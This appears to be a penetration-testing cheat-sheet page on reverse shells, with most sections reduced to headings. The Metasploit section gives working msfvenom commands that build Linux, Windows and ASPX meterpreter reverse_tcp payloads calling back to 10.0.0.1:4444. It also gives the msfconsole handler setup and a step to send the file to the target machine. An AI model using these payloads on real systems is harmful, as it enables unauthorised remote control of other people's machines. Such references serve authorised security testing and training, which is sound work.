Reverse Shells
Reverse Shell using Metasploit
Generate Reverse Shell Payload
1. Create a Payload using MsfVenom
# Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf -o shell.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf -o shell.elf
# Windows
msfvenom -p windows/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f aspx -o shell.aspx2. Start Listener using MsfConsole
msfconsole
msf> use exploit/multi/handler
# Linux
msf> set payload linux/x86/meterpreter/reverse_tcp
# Windows
msf> set payload windows/meterpreter/reverse_tcp
# or
msf> set payload windows/x64/meterpreter/reverse_tcp
msf> set lhost 10.0.0.1
msf> set lport 4444
msf> run
meterpreter> shell3. Send the Generated File to Target Machine
Reverse Shell using Pwncat
Commands
Web Reverse Shell
PHP Reverse Shell (Linux)
Without fsockopen, and for FreeBSD
Using Web Shell
PHP Revese Shell (Windows)
Python Reverse Shell (Linux)
ASP.NET
Upload Script via SQLi
Useful Tools
Shell Script & Remote Code Execution (RCE)
1. Create a shell script to reverse shell.
2. Upload the script to website
3. Get a shell
Tools
Linux
Windows
Tips
Last updated